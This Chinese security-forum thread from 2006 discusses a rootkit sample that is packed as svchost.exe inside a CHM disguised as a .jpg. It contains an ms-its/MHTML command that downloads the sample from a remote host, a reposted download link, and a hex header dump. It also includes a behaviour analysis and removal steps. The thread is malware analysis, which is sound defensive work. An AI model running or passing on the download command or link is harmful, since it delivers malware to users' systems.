首页
社区
课程
招聘
谁有空分析一下rootkit
发表于: 2006-5-5 22:06 5828

谁有空分析一下rootkit

2006-5-5 22:06
5828
下载地址为
http://webshell.cardb.cn/err_404.jpg::/svchost.exe
一般的浏览器方式下载不了,需在命令行键入

start ms-its:mhtml:c:\\.mht!http://webshell.cardb.cn/err_404.jpg::/svchost.exe

确认下载,其md5
为8a6c75beecfdeecb891495fb530fdcb7   svchost.exe
23,472 字节,执行后程序自删除,iceword.exe查不出任何异端,最新杀毒软件差不出
用winhex看,文件做的很精致

00000000   4D 5A 4B 45 52 4E 45 4C  33 32 2E 44 4C 4C 00 00   MZKERNEL32.DLL..
00000010   50 45 00 00 4C 01 03 00  BE B0 11 40 00 AD 50 FF   PE..L...景.@.??
00000020   76 34 EB 7C 48 01 0F 01  0B 01 4C 6F 61 64 4C 69   v4朦H.....LoadLi
00000030   62 72 61 72 79 41 00 00  18 10 00 00 10 00 00 00   braryA..........
00000040   00 20 00 00 00 00 40 00  00 10 00 00 00 02 00 00   . ....@.........
00000050   04 00 00 00 00 00 3A 00  04 00 00 00 00 00 00 00   ......:.........
00000060   00 90 01 00 00 02 00 00  00 00 00 00 02 00 00 00   .?.............

打微狗很累了,改天自己分析一下。

[课程]FART 脱壳王!加量不加价!FART作者讲授!

收藏
免费 0
支持
分享
最新回复 (16)
雪    币: 513
活跃值: (2258)
能力值: ( LV9,RANK:2130 )
在线值:
发帖
回帖
粉丝
2
无法下载,能下载者贴个附件上来
2006-5-5 22:50
0
雪    币: 367
活跃值: (42)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
可以直接下载jpg 后缀改成chm 反编译得到4个文件,不要碰htm,先改exe文件名
2006-5-6 01:43
0
雪    币: 196
活跃值: (135)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
4
楼上的能不能上传一个.
2006-5-6 06:03
0
雪    币: 116
活跃值: (774)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
http://www.pupbt.com/down.asp?down=ac348b51bf3a5aaf
权限不够,不能使用附件功能,只好中转一下
2006-5-6 07:36
0
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
6
文件做的很精致
chm网马中嵌木马,这个文件是用Upack压缩的.
2006-5-6 07:47
0
雪    币: 116
活跃值: (774)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
已经搞定。
文件释放TempDll371.dll,利用导出函数install安装自身为6to4服务,并复制w为系统目录下winmide32.dll和wins\wins.lib
使用批处理文件_Dll_Ins_DeleteMe__.bat删除自身。

:Retry

del "D:\svchost.exe"

if exist "D:\svchost.exe" goto Retry

del "_Dll_Ins_DeleteMe__.bat"

删除很简单,在安全模式下删除文件
winmide32.dll,wins.lib并删除服务项6to4即可。
2006-5-6 08:46
0
雪    币: 427
活跃值: (412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
http://webshell.cardb.cn/err_404.jpg::/svchost.exe
这是什么原理?
2006-5-6 08:51
0
雪    币: 513
活跃值: (2258)
能力值: ( LV9,RANK:2130 )
在线值:
发帖
回帖
粉丝
9
http://webshell.cardb.cn/err_404.jpg::/svchost.exe
这是什么原理?
实际上就是一个chm文件里包含的exe文件。
2006-5-6 11:28
0
雪    币: 211
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
http://webshell.cardb.cn/err_404.jpg::/svchost.exe
这种地址第一次看到
2006-5-6 17:32
0
雪    币: 213
活跃值: (96)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
11
2006-5-8 21:26
0
雪    币: 233
活跃值: (10)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
12
见识了  
2006-5-8 23:29
0
雪    币: 146
活跃值: (72)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
13
呵呵,林子太大。
2006-5-8 23:51
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
最初由 duzaizhe 发布
http://webshell.cardb.cn/err_404.jpg::/svchost.exe
这种地址第一次看到


我也是第一次看到这种地址。。看上去楼主象是个玩hack和crack的高手。。
2006-5-10 11:34
0
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
15
有没有搞错,断章取意,下面的才是地址:

ms-its:mhtml:c:\\.mht!http://webshell.cardb.cn/err_404.jpg::/svchost.exe


http://webshell.cardb.cn/err_404.jpg::/svchost.exe 单纯这样是没有意义的
2006-5-10 12:00
0
雪    币: 214
活跃值: (40)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
16
最初由 axxer 发布
我也是第一次看到这种地址。。看上去楼主象是个玩hack和crack的高手。。


楼上的才是哦
2006-5-10 12:01
0
雪    币: 0
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
17
在讨论hack?看不懂
2006-5-10 14:49
0
游客
登录 | 注册 方可回帖
返回
//